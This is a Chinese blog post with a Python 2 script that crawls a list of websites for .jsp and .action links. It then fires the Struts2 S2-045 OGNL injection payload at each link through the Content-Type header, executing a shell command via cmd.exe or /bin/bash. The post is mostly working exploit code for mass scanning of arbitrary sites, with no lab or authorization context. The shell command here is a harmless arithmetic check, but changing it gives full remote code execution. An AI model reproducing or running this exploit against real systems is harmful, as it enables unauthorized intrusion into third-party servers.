【Python】批量爬取网站URL测试Struts2-045漏洞
1、概述都懒得写了。。。。
就是批量测试用的,什么工具里扣出来的POC,然后根据自己的理解写了个爬网站首页URL的代码。。。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import random
import httplib
import re
import os
import sys
#########################
## 作者:zzzzzhhhhhhh
## Code功能
## 1、批量获取指定网站的URL
## 2、批量验证Struts2-045漏洞
## BUG:121个左右根据网络状况会报错,清除已测试过的网址再测试就没啥问题。懵逼
###########################
# 出现ChunkedEncodingError问题,更改为HTTP 1.0
httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0'
# 存放内容
http_URL = []
http_website = []
# 增加HTTP头部
def add_http(url):
if "http://" not in url:
url = 'http://' + url
return url
# 爬行首页URL
def curl_Site_URL(url):
url = add_http(url)
website = url # 存储一下域名,路径碰路径
# 获取网页内容
try:
r = requests.get(url)
except requests.RequestException as e:
print "error website:"+url
return False
data = r.text
# 利用正则查找所有连接
link_list = re.findall(r"(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')", data)
for url in link_list:
filename = os.path.basename(url) # 取出文件名
(shotname, extension) = os.path.splitext(filename) # 取出文件后缀
if ((extension == ".jsp") or (extension == ".action")): # 指定后缀检测
if 'http://' not in url: # 检测是否有HTTP://
url = website + url
http_URL.append(url) # 读取到列表里或者写入文件中
else:
http_URL.append(url)
## 2、验证Stuts2漏洞
def poc(url):
url = add_http(url)
try:
a = random.randint(10000000, 20000000)
b = random.randint(10000000, 20000000)
c = a + b
win = 'set /a ' + str(a) + ' + ' + str(b)
linux = 'expr ' + str(a) + ' + ' + str(b)
header = dict()
header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
header["Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + win + "'):(#cmd='" + linux + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
r = requests.post(url, headers=header, timeout=5)
if str(c) in r.text:
return '[S2-045 vul]'+url
else:
return False
except Exception:
return False
# 读取文件函数
def read_file(file_path):
# 判断文件路径是否存在,如果不存在直接退出,否则读取文件内容
if not os.path.exists(file_path):
print 'Please confirm correct filepath !'
sys.exit(0)
else:
with open(file_path, 'r') as source:
for line in source:
http_website.append(line.rstrip('\r\n').rstrip('\n'))
# 批量读取
sum = 0
for website in http_website:
print website
curl_Site_URL(website)
# 批量验证
for d in http_URL:
result = poc(d)
if result != False:
print result
if __name__ == '__main__':
file_str=raw_input('Input file IP.txt filepath eg:D:\\\\test.txt \n')
read_file(file_str)
## C:\\Users\\AT\\Desktop\\domain.txt
代码特效
txt里保存网站地址就可以了,爬虫还需要后续学习优化、添加功能。。。
===========================================================
一个独立安全研究员,自由职业者的知识星球《公鸡队之家》,一边研究技术,一边分享到星球,一边养活自己,我们都有一颗好为人师的心,赠人玫瑰,手留余香。星球的价格是199¥/年。希望大家赏光,加入二维码在文末。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步